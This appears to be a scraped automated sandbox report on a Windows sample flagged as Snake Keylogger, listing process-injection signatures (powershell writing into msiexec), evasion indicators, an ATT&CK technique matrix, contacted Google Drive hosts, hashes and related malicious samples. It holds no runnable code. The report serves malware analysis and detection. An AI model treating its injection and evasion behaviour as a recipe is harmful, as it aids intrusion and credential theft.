    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7988Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1686Jump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dllJump to dropped file
    Source: C:\Users\user\Desktop\beNxougDFV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 7256Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_00406232 FindFirstFileA,FindClose,0_2_00406232
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004056F7
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
    Source: msiexec.exe, 00000007.00000003.2435501502.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\beNxougDFV.exeAPI call chain: ExitProcess graph end nodegraph_0-3539
    Source: C:\Users\user\Desktop\beNxougDFV.exeAPI call chain: ExitProcess graph end nodegraph_0-3541
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E60000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031BB
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts2
    PowerShell
    Boot or Logon Initialization Scripts311
    Process Injection
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop Protocol1
    Clipboard Data
    3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Access Token Manipulation
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture14
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing
    LSA Secrets3
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials14
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    beNxougDFV.exe50%ReversingLabsWin32.Spyware.Snakekeylogger
    beNxougDFV.exe100%AviraTR/AVI.Agent.ennqy
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe100%AviraTR/AVI.Agent.ennqy
    C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dll0%ReversingLabs
    C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe50%ReversingLabsWin32.Spyware.Snakekeylogger
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://translate.googl0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    drive.google.com
    172.217.19.174
    truefalse
      high
      drive.usercontent.google.com
      142.250.181.1
      truefalse
        high
        s-part-0035.t-0009.t-msedge.net
        13.107.246.63
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.commsiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://drive.usercontent.google.com/)rLSmsiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2294517511.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://nsis.sf.net/NSIS_ErrorbeNxougDFV.exe, beNxougDFV.exe.2.drfalse
                high
                https://drive.google.com/cqmsiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.google.com/msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://translate.googlmsiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.usercontent.google.com/cmsiexec.exe, 00000007.00000003.2435501502.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/smsiexec.exe, 00000007.00000002.2601099669.000000000982F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435501502.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000983E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.usercontent.google.com/msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://apis.google.commsiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorbeNxougDFV.exe, beNxougDFV.exe.2.drfalse
                                high
                                https://drive.google.com/#pMR=msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/smsiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/ificatemsiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.181.1
                                      drive.usercontent.google.comUnited States
                                      15169GOOGLEUSfalse
                                      172.217.19.174
                                      drive.google.comUnited States
                                      15169GOOGLEUSfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1567517
                                      Start date and time:2024-12-03 16:39:45 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 47s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:beNxougDFV.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@6/14@2/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 42
                                      • Number of non-executed functions: 24
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • VT rate limit hit for: beNxougDFV.exe
                                      TimeTypeDescription
                                      10:40:45API Interceptor39x Sleep call for process: powershell.exe modified
                                      10:42:18API Interceptor6x Sleep call for process: msiexec.exe modified
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      s-part-0035.t-0009.t-msedge.net4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.246.63
                                      MOaSkQR8WU.xlsxGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      Ksl3V3pqZq.xlsGet hashmaliciousUnknownBrowse
                                      • 13.107.246.63
                                      pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                      • 13.107.246.63
                                      lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                      • 13.107.246.63
                                      VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                      • 13.107.246.63
                                      YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                      • 13.107.246.63
                                      Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 13.107.246.63
                                      RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                      • 13.107.246.63
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      REQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      Curri.lNK.lnkGet hashmaliciousUnknownBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      36244920cQPUT1.lNK.lnkGet hashmaliciousUnknownBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 142.250.181.1
                                      • 172.217.19.174
                                      No context
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):14744
                                      Entropy (8bit):4.992175361088568
                                      Encrypted:false
                                      SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                      MD5:A35685B2B980F4BD3C6FD278EA661412
                                      SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                      SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                      SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
